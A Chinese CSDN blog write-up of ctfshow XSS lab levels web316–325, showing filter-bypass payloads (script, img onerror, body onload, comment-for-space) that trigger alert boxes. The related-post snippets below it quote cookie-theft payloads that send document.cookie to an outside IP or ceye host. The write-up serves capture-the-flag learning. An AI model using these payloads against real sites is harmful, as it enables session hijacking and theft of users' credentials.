ctfshow web入门 xss(持续更新)

最新推荐文章于 2024-07-31 13:21:53 发布
最新推荐文章于 2024-07-31 13:21:53 发布
阅读量588 收藏
点赞数
分类专栏: CTF 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/119486301
版权

文章目录

前言

因为各种各样的问题,我这里就只让他弹窗,而不把获取flag作为目标了

web316

第一关,很简单,没有过滤,直接

<script>alert(0)</script>

就能弹窗

web317

有过滤了,可能是把script过滤了,可以用img标签

<img src=1 onerror=alert(0)>

web318-319

img标签也被过滤了,可以用body标签,它被ban的概率比较小

<body onload=alert(0)></body>

web320-325

把空格过滤了,换成/**/

<body/**/onload=alert(0)></body>
Lum1n0us
关注
专栏目录
CTFshow XSS(web316-333)
Kradress的博客
03-18 752
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
2024年CTFSHOW-Web入门题解(更新中)
2401_84252743的博客
05-01 547
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTFshow-WEB入门-XSS
feng的博客
02-28 6618
前言 因为不太会javascript,所以对于xss的了解一直比较少,也不太会,这次做一下xss专题,学习一下xssweb316 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! 意思是要生成链接,应该就还是获得管理员cookie这样的题目,大师傅们说题目的bot是每隔一段时间自动点击的。 可以利用xss平台: XSS平台 以后我都用自己vps。 首先测试一下<script>alert(1)</script>,弹窗成功,第一题应该是没有任何的过滤,所以直接打co
CTFshow_XSSxss-labs全关卡万字通关笔记
最新发布
dasdasdasvsdV的博客
07-31 296
反射型非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来访问带有恶意代码的链接。造成反射型XSS主要是GET类型。存储型持久型,常见的就是在博客留言板、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端(数据库、内存、文件系统等),每次访问都会触发恶意代码。DOM型DOM型XSS其实是一种特殊类型的反射型XSS,也被称作本地跨站,它是基于DOM文档对象模型的一种漏洞。
ctfshow web入门 xss
jie_a的博客
05-31 903
web316-web326 首先用xss平台实验了下 没有flag,群主说要生成连接,然后后台会有个机器人点一下 呢咱们就生成连接 <input onfocus="window.open('http://121.4.162.152:8888/'+document.cookie)" autofocus> 然后用咱们的vps监听端口 然后flag 就出来了 详细绕过姿势看这个大佬博客 <body onload="window.location.href='http://121.4.16
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 2038
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1338
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....
ctfshow web入门
05-14
如果你想学习Web安全的话,可以先从Web入门开始学起。 对于Web入门,你需要掌握以下知识: 1. HTTP协议:了解HTTP请求和响应的基本格式、状态码的含义等。 2. HTML、CSS、JavaScript:掌握基本的HTML标签、CSS...
ctf_show笔记篇(web入门---XSS
whale_waves的博客
04-01 1290
这里简单对xss做一个了解:xss分为反射型和储存型反射型:一般是由攻击者选择攻击对象,对攻击对象发一个带有xss窃取cookie的页面的url,被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器,当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型:攻击方将恶意代码插入在存在漏洞的网站上,任何访问网站的人都会遭到攻击,比起反射型xss,存储型xss危害更大,范围更广。
CTFShow Xss
paidx0
08-12 1415
CTFShow Xss(学习) 简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export xss 分类:(三类) 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺
ctfshow XSS
quan9i的博客
06-28 1502
ctfshow XSS 316-333
CTFSHOW-XSS
byname1的博客
03-10 1094
说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
ctfshow XSS专题
yink12138的博客
12-17 1503
ctfshow XSS专题
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1894
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
ctfshowXSS
njh18790816639的博客
05-19 332
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值